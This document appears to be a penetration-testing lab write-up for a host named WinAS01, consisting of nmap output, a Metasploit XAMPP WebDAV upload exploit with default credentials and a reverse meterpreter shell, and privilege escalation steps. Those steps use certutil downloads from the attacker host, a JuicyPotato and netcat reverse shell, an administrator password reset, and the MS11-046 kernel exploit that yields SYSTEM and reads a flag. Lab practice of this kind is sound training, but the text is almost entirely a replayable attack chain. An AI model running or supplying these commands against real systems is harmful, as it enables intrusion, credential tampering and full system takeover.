nmap

nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-13 17:05 EST
Stats: 0:01:15 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 78.68% done; ETC: 17:06 (0:00:20 remaining)
Nmap scan report for 10.11.1.136
Host is up (0.019s latency).
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Apache httpd 2.4.3 ((Win32) OpenSSL/1.0.1c PHP/5.4.7)
|_http-server-header: Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7
| http-title: XAMPP 1.8.1
|_Requested resource was http://10.11.1.136/xampp/
443/tcp  open  ssl/http           Apache httpd 2.4.3 ((Win32) OpenSSL/1.0.1c PHP/5.4.7)
|_http-server-header: Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7
|_ssl-date: 2025-02-13T22:08:08+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
| http-title: XAMPP 1.8.1
|_Requested resource was https://10.11.1.136/xampp/
3389/tcp open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=Winas01-PC
| Not valid before: 2025-02-12T21:11:16
|_Not valid after:  2025-08-14T21:11:16
|_ssl-date: 2025-02-13T22:08:08+00:00; 0s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: firewall|VoIP phone|VoIP adapter|broadband router|WAP
Running (JUST GUESSING): Fortinet embedded (97%), Polycom embedded (90%), Vonage embedded (90%), OneAccess embedded (87%), Orange embedded (87%), Sagem Communication embedded (87%)
OS CPE: cpe:/h:polycom:soundpoint_ip_331 cpe:/h:vonage:v-portal cpe:/h:oneaccess:1641 cpe:/h:orange:livebox cpe:/h:sagem:f%40ast_334 cpe:/h:sagem:f%40ast_3304
Aggressive OS guesses: Fortinet FortiGate-50B or 310B firewall (97%), Fortinet FortiGate 100D firewall (90%), Fortinet FortiGate 1500D firewall (90%), Fortinet FortiGate-60B or -100A firewall (90%), Polycom SoundPoint IP 331 VoIP phone (90%), Vonage V-Portal VoIP adapter (90%), OneAccess 1641 router (87%), Orange Livebox wireless DSL router or Sagem F@st 334 or 3304 DSL router (87%), Sagem F@st 3302 DSL router (87%)
No exact OS matches for host (test conditions non-ideal).
 
TRACEROUTE
HOP RTT      ADDRESS
1   18.91 ms 10.11.1.136
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 169.71 seconds

Xampp Webdav arbitrary File upload

search for XAMPP 1.8.1 webdav exploit
https://www.rapid7.com/db/modules/exploit/windows/http/xampp_webdav_upload_php/

msf6 exploit(windows/http/xampp_webdav_upload_php) > options
 
Module options (exploit/windows/http/xampp_webdav_upload_php):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME                   no        The filename to give the payload. (Leave Blank for Random)
   PASSWORD  xampp            yes       The HTTP password to specify for authentication
   PATH      /webdav/         yes       The path to attempt to upload
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS    10.11.1.136      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     80               yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME  wampp            yes       The HTTP username to specify for authentication
   VHOST                      no        HTTP server virtual host
 
 
Payload options (php/meterpreter/reverse_tcp):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.1.1       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic
 
 
 
View the full module info with the info, or info -d command.

msf6 exploit(windows/http/xampp_webdav_upload_php) > set rhosts 10.11.1.136
rhosts => 10.11.1.136
msf6 exploit(windows/http/xampp_webdav_upload_php) > set lhost 172.16.1.1
lhost => 172.16.1.1
msf6 exploit(windows/http/xampp_webdav_upload_php) > run
 
[*] Started reverse TCP handler on 172.16.1.1:4444 
[*] Uploading Payload to /webdav/GOz2E8h.php
[*] Attempting to execute Payload
[*] Sending stage (40004 bytes) to 10.11.1.136
[*] Meterpreter session 1 opened (172.16.1.1:4444 -> 10.11.1.136:49317) at 2025-02-13 19:48:24 -0500
 
meterpreter > getuid
Server username: Winas01

meptasploit failed

https://github.com/ruthvikvegunta/XAMPP-WebDAV-Exploit

priv esc

C:\xampp\webdav>whoami /priv
whoami /priv
 
PRIVILEGES INFORMATION
----------------------
 
Privilege Name                Description                               State   
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

SeImpersonatePrivilege

cmd

C:\xampp\webdav>systeminfo
systeminfo
 
Host Name:                 WINAS01-PC
OS Name:                   Microsoft Windows 7 Professional 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Winas01
Registered Organization:   
Product ID:                55041-035-7319877-86893
Original Install Date:     11/5/2016, 6:56:40 PM
System Boot Time:          2/13/2025, 1:11:01 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 6 Model 85 Stepping 7 GenuineIntel ~2194 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     1,023 MB
Available Physical Memory: 698 MB
Virtual Memory: Max Size:  2,047 MB
Virtual Memory: Available: 1,211 MB
Virtual Memory: In Use:    836 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\WINAS01-PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2884256
                           [02]: KB976902
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.11.1.136
                                 [02]: fe80::7090:53f5:6a53:2531

C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/JuicyPotatox86.exe JuicyPotatox86.exe
C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/nc.exe nc.exe

cmd

c:\xampp\webdav\JuicyPotatox86.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\xampp\webdav\nc.exe 172.16.1.1 443 -e cmd.exe" -t *

C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/PrintSpoofer32.exe PrintSpoofer32.exe

cmd

.\PrintSpoofer32.exe -c "net user administrator Welcome1" output

cmd

C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/GodPotato-NET2.exe GodPotato-NET2.exe
C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/GodPotato-NET35.exe GodPotato-NET35.exe

cmd

C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/winPEASx86.exe winPEASx86.exe

cmd

Host Name:                 WINAS01-PC
OS Name:                   Microsoft Windows 7 Professional 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Winas01
Registered Organization:   
Product ID:                55041-035-7319877-86893
Original Install Date:     11/5/2016, 6:56:40 PM
System Boot Time:          2/13/2025, 1:11:01 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 6 Model 85 Stepping 7 GenuineIntel ~2194 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     1,023 MB
Available Physical Memory: 647 MB
Virtual Memory: Max Size:  2,047 MB
Virtual Memory: Available: 1,174 MB
Virtual Memory: In Use:    873 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\WINAS01-PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2884256
                           [02]: KB976902
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.11.1.136
                                 [02]: fe80::7090:53f5:6a53:2531

sudo python2.7 windows-exploit-suggester.py --update

cmd

C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/bfill.exe bfill.exe

cmd

C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/MS14-40-x86.exe MS14-40-x86.exe

cmd

C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/42432.exe 42432.exe

kernel MS11-046

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS11-046

cmd

C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/ms11-046.exe ms11-046.exe
certutil.exe -f -urlcache -split http://172.16.1.1/ms11-046.exe ms11-046.exe
****  Online  ****
  000000  ...
  01b8af
CertUtil: -URLCache command completed successfully.
 
C:\xampp\webdav>.\ms11-046.exe
.\ms11-046.exe
 
c:\Windows\System32>whoami
whoami
nt authority\system
 
c:\Windows\System32>type C:\users\administrator\desktop\key.txt
type C:\users\administrator\desktop\key.txt
25cx2lbsi97ofbcosbyp
c:\Windows\System32>date
date
The current date is: Thu 02/13/2025 
Enter the new date: (mm-dd-yy)

VHL — WinAS01

nmap

Xampp Webdav arbitrary File upload

priv esc

SeImpersonatePrivilege

kernel MS11-046